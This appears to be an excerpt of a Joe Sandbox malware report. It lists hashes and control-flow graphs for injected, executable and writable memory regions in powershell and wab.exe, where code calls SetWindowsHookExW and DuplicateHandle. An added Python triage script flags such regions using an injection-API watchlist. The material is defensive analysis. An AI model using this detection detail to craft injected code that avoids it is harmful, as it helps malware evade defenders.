                                                                                      • Instruction Fuzzy Hash: C4017878608391EFC31A4B28D894916BBB9FF8B359739856EC49887345C730ACD2CB60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a19fb5ce4cc6ea5fea658a8b0691d8696d69778e1e79e83128ef919564e6fb6
                                                                                      • Instruction ID: 63b0e07e1b332e184a5d87321411594c342524b4ba74cb7abf101e24464e4b93
                                                                                      • Opcode Fuzzy Hash: 4a19fb5ce4cc6ea5fea658a8b0691d8696d69778e1e79e83128ef919564e6fb6
                                                                                      • Instruction Fuzzy Hash: C0011935A00109EFCB14CF98D9809ADF7B2FB88324B248669D519A7655C732AC52CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a67cbd88153d91bbd00e8be855bf30ebe5842ed4f2d7b80a1e5a598e7eb662c
                                                                                      • Instruction ID: 4eeeb6513082ef75871bfe357038bbc8eb83c4e0a55e38e223b9edd33ddea422
                                                                                      • Opcode Fuzzy Hash: 9a67cbd88153d91bbd00e8be855bf30ebe5842ed4f2d7b80a1e5a598e7eb662c
                                                                                      • Instruction Fuzzy Hash: 31F03075A00118DFCB40CB9CD8509ADF7BAFF8C221B248159E518A7255C736AC12CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a2b00becd2bc1f2ed958a1e0e8ed7f587c0971a505dc7b38e03d4f6345f9ec6
                                                                                      • Instruction ID: c768ac25dc30df0fc0df7afe796ddd6ebc0f9b7495fac069153cabe5c487bcf7
                                                                                      • Opcode Fuzzy Hash: 3a2b00becd2bc1f2ed958a1e0e8ed7f587c0971a505dc7b38e03d4f6345f9ec6
                                                                                      • Instruction Fuzzy Hash: F2315C347056558FCB55DB39C4848AABBF6FF8620035445AAE142DBB72DA70ED18CBA0

                                                                                      Execution Graph

                                                                                      Execution Coverage: 6.6%
                                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                                      Signature Coverage: 0%
                                                                                      Total number of Nodes: 5
                                                                                      Total number of Limit Nodes: 0
                                                                                      execution_graph (nodes and edges, flattened during extraction; addresses lie in the wab.exe region at 02730000)
                                                                                      • 13082: 2737378 DuplicateHandle
                                                                                      • 13083: 273740e
                                                                                      • 13084: 2732278
                                                                                      • 13085: 27322bc SetWindowsHookExW
                                                                                      • 13087: 2732302
                                                                                      • Edges: 13082->13083, 13084->13085, 13085->13087
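The regions dumped above share one shape: a private allocation in powershell (process 6) or wab (process 12), page protection 00000040 (PAGE_EXECUTE_READWRITE), memory type 00020000 (MEM_PRIVATE), and "based on PE: false", i.e. no image backs the code; in wab the only resolved calls are DuplicateHandle and SetWindowsHookExW. The Python below is an added triage helper written for this page, not Joe Sandbox code. It decodes the .sdmp source names exactly as they appear in the report and ranks the regions. Assumptions: the name layout (process number, dump type, dump id, base address, page protection, an undecoded word, memory type, an undecoded word) is inferred from the names on this page and the matching snapshot name hcaresult_12_2_2730000_wab.jbxd; the PAGE_*/MEM_* values are the documented Win32 constants; the API watchlist beyond the two APIs in the report, and the final image-backed region, are constructed for contrast.

```python
"""Decode Joe Sandbox .sdmp source names and flag injected-code regions.
Added example; field layout of the name is inferred (see lead-in)."""
import re
from dataclasses import dataclass

# Documented Win32 MEMORY_BASIC_INFORMATION.Protect constants.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_EXECUTE_MASK = 0xF0   # any PAGE_EXECUTE* bit
PAGE_WRITE_MASK = 0xCC     # READWRITE | WRITECOPY | EXECUTE_READWRITE | EXECUTE_WRITECOPY

# Documented Win32 MEMORY_BASIC_INFORMATION.Type constants.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# APIs worth attention when called from non-image memory. The first two are
# the ones resolved in this report; the rest is an assumed watchlist.
HOOK_APIS = {"SetWindowsHookExW", "SetWindowsHookExA", "DuplicateHandle",
             "WriteProcessMemory", "NtWriteVirtualMemory", "CreateRemoteThread"}

# <proc>.<dump type>.<dump id>.<base>.<protect>.<undecoded>.<mem type>.<undecoded>.sdmp
_SDMP = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$")


@dataclass(frozen=True)
class DumpRegion:
    process_no: int
    dump_type: int
    base: int
    protect: int
    mem_type: int
    pe_backed: bool          # the report's "based on PE" flag
    apis: frozenset          # APIs the report resolved inside the region

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def is_rwx(self) -> bool:
        return bool(self.protect & PAGE_EXECUTE_MASK) and bool(self.protect & PAGE_WRITE_MASK)

    @property
    def looks_injected(self) -> bool:
        # Writable+executable private memory with no PE image behind it is the
        # usual footprint of unpacked or injected code.
        return self.is_rwx and self.mem_type == 0x20000 and not self.pe_backed

    def hook_apis(self) -> frozenset:
        return self.apis & HOOK_APIS


def parse_sdmp(name: str, pe_backed: bool, apis=()) -> DumpRegion:
    m = _SDMP.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name}")
    return DumpRegion(process_no=int(m["proc"], 16), dump_type=int(m["kind"], 16),
                      base=int(m["base"], 16), protect=int(m["protect"], 16),
                      mem_type=int(m["mtype"], 16), pe_backed=pe_backed, apis=frozenset(apis))


def triage(regions):
    """Return (region, verdict) pairs for regions worth a look, worst first."""
    findings = []
    for r in regions:
        if r.looks_injected and r.hook_apis():
            findings.append((r, "injected RWX region calling " + ", ".join(sorted(r.hook_apis()))))
        elif r.looks_injected:
            findings.append((r, "injected RWX region, no resolved API calls"))
    findings.sort(key=lambda rv: (0 if "calling" in rv[1] else 1, rv[0].process_no, rv[0].base))
    return findings


# Source names copied from this report (process 6 = powershell, process 12 = wab),
# with the report's "based on PE" flag and resolved APIs. Last entry: constructed
# image-backed PAGE_EXECUTE_READ region, to show what does not fire.
REPORT_REGIONS = [
    parse_sdmp("00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp", False),
    parse_sdmp("00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp", False),
    parse_sdmp("0000000C.00000002.3357147883.0000000002730000.00000040.00000800.00020000.00000000.sdmp", False,
               ["DuplicateHandle", "SetWindowsHookExW"]),
    parse_sdmp("0000000C.00000002.3356505903.00000000026FD000.00000040.00000800.00020000.00000000.sdmp", False),
    parse_sdmp("0000000C.00000002.3356748912.000000000270D000.00000040.00000800.00020000.00000000.sdmp", False),
    parse_sdmp("00000003.00000002.1000000001.0000000000400000.00000020.00000000.01000000.00000000.sdmp", True),
]

if __name__ == "__main__":
    for region, verdict in triage(REPORT_REGIONS):
        print(f"proc {region.process_no:>2} base 0x{region.base:08x} "
              f"{region.protect_name} {region.mem_type_name}: {verdict}")
```

Run as a script it lists the five RWX private regions with the wab region at 02730000 first, since it is the only one with hooking APIs resolved in it; the constructed image-backed region is not reported.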

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph (basic blocks and edges, flattened during extraction)
                                                                                      • 78: 2737370-2737375
                                                                                      • 79: 27373a2-273740c DuplicateHandle
                                                                                      • 80: 2737377-27373a1
                                                                                      • 81: 2737415-2737432
                                                                                      • 82: 273740e-2737414
                                                                                      • Edges: 78->79, 78->80, 79->81, 79->82, 80->79, 82->81
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027373FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3357147883.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_2730000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 07ee698eb50c49904ccf46b1dbdbd36901bdc81abd480f397519c178a3e71103
                                                                                      • Instruction ID: 27e2791abcdb963252b8d3474bd371fe953b11894301de8d7249f57a38209054
                                                                                      • Opcode Fuzzy Hash: 07ee698eb50c49904ccf46b1dbdbd36901bdc81abd480f397519c178a3e71103
                                                                                      • Instruction Fuzzy Hash: 2621F4B5D00249DFDB10CFA9D584ADEFBF4EF48324F14841AE914A3211D378A950CFA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph (basic blocks and edges, flattened during extraction)
                                                                                      • 85: 2737378-273740c DuplicateHandle
                                                                                      • 86: 2737415-2737432
                                                                                      • 87: 273740e-2737414
                                                                                      • Edges: 85->86, 85->87, 87->86
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027373FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3357147883.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_2730000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: cf8bdd7156d36465249d41482d5c8d925cb89371e2bf980f8b057611c92d26a0
                                                                                      • Instruction ID: baa14f35f93182b23674805b8fc7294b3d9f7dfd982a8b9e21feb89140e8829e
                                                                                      • Opcode Fuzzy Hash: cf8bdd7156d36465249d41482d5c8d925cb89371e2bf980f8b057611c92d26a0
                                                                                      • Instruction Fuzzy Hash: C921E0B59002499FDB10CFAAD984ADEFFF4EB48324F14841AE918A3310D379A950CFA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph (basic blocks and edges, flattened during extraction)
                                                                                      • 90: 2732270-27322c2
                                                                                      • 93: 27322c4
                                                                                      • 94: 27322ce-2732300 SetWindowsHookExW
                                                                                      • 95: 2732302-2732308
                                                                                      • 96: 2732309-273232e
                                                                                      • 97: 27322cc
                                                                                      • Edges: 90->93, 90->94, 93->97, 94->95, 94->96, 95->96, 97->94
                                                                                      APIs
                                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 027322F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3357147883.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_2730000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: ff4d69c55d6e5fb3def09b2be16b6586a643c9b64f326eeb8ccb956bb137eb53
                                                                                      • Instruction ID: 6707c3ba0a18039986ac4d01284d555f7aada1432eb1f11adb67202230bf7fcd
                                                                                      • Opcode Fuzzy Hash: ff4d69c55d6e5fb3def09b2be16b6586a643c9b64f326eeb8ccb956bb137eb53
                                                                                      • Instruction Fuzzy Hash: 03211875D002499FDB14CF9AC944BDEBBF4FF88310F10842AE455A7251DB78A940CFA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph (basic blocks and edges, flattened during extraction)
                                                                                      • 101: 2732278-27322c2
                                                                                      • 103: 27322c4
                                                                                      • 104: 27322ce-2732300 SetWindowsHookExW
                                                                                      • 105: 2732302-2732308
                                                                                      • 106: 2732309-273232e
                                                                                      • 107: 27322cc
                                                                                      • Edges: 101->103, 101->104, 103->107, 104->105, 104->106, 105->106, 107->104
                                                                                      APIs
                                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 027322F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3357147883.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_2730000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: 65383997068426c9fb2dbe258198a2d128a5c24b2455ee34a3fcee3594dc0250
                                                                                      • Instruction ID: 3caea2188897e690bb7e3373d0737fa75912524f521096aed257bd6160405181
                                                                                      • Opcode Fuzzy Hash: 65383997068426c9fb2dbe258198a2d128a5c24b2455ee34a3fcee3594dc0250
                                                                                      • Instruction Fuzzy Hash: 112115B5D002499FDB14CFAAC944BDEBBF4BF88310F108429E459A7250DB74A940CFA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3356505903.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_26fd000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17f26a75d98f73e567f0969c4b32f1daa9bf0f04ff517ce4327e6bae3abe93fb
                                                                                      • Instruction ID: a477dbd0876c971313216ff1e3922d9160b809616c749156c0acad951bfe7d9a
• Opcode Fuzzy Hash: 17f26a75d98f73e567f0969c4b32f1daa9bf0f04ff517ce4327e6bae3abe93fb
• Instruction Fuzzy Hash: 442125B2504204DFDF55DF14D9C0B2ABF62FB88318F20816DDA0A0B256C376E856CAA2
Memory Dump Source
• Source File: 0000000C.00000002.3356505903.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_26fd000_wab.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 844d4f5f58bc0bcb3f805e6655a265442a6ed30fc4371c1fdad3a09cbbcb8117
• Instruction ID: cd19e9452df4b1eed3041c196f21315fd0a513c1d184515ad79ff98b0fe0fb53
• Opcode Fuzzy Hash: 844d4f5f58bc0bcb3f805e6655a265442a6ed30fc4371c1fdad3a09cbbcb8117
• Instruction Fuzzy Hash: 70210372504240EFDF49DF14D9C0F2ABF62FB84324F20C169DA090B256C376F456CAA2
Memory Dump Source
• Source File: 0000000C.00000002.3356748912.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_270d000_wab.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8fc988281079051e3c6bcfbe6f19cb8bc79dd9ed515e69af0dc5012135c7d888
• Instruction ID: 3cacf11d1a5031becd9911d9e23540092de6e93163c6724673ee135688517ede
• Opcode Fuzzy Hash: 8fc988281079051e3c6bcfbe6f19cb8bc79dd9ed515e69af0dc5012135c7d888
• Instruction Fuzzy Hash: 4B2107B5504304EFDB14DF54D9C0B26BBA1FB88314F20C56DD9094B292CB76DC5ACA61
Memory Dump Source
• Source File: 0000000C.00000002.3356505903.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_26fd000_wab.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
• Instruction ID: f7d149d628c64bd6b22519c9b1e4bb647da57ba1d30f9f4e2e3398edcc40e516
• Opcode Fuzzy Hash: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
• Instruction Fuzzy Hash: 4B11B1B6504284CFCF15CF10D5C4B16BF62FB84318F24C5A9D9490B256C33AE456CBA2
Memory Dump Source
• Source File: 0000000C.00000002.3356505903.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_26fd000_wab.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
• Instruction ID: 6992c81e22815575957eb11ba293690f16989807ee59d0fb6d8b54771f13c965
• Opcode Fuzzy Hash: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
• Instruction Fuzzy Hash: F311AF76504280DFCF16CF10D5C4B1ABF62FB84324F24C5A9D9494B656C33AE45ACBA2
Memory Dump Source
• Source File: 0000000C.00000002.3356748912.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_270d000_wab.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50f7e29a630608d0546145974b4e8461a6f7dcc6741a455d6d64f55d25f6ac08
• Instruction ID: af08ea75a12ba18f11c4ddc3b77497948c4b45947278de4a77fc0a1328ac2e1d
• Opcode Fuzzy Hash: 50f7e29a630608d0546145974b4e8461a6f7dcc6741a455d6d64f55d25f6ac08
• Instruction Fuzzy Hash: ED11DD75504384CFDB15CF50DAC4B15FBA2FB88328F24C6A9D8494B296C33AD84ACF62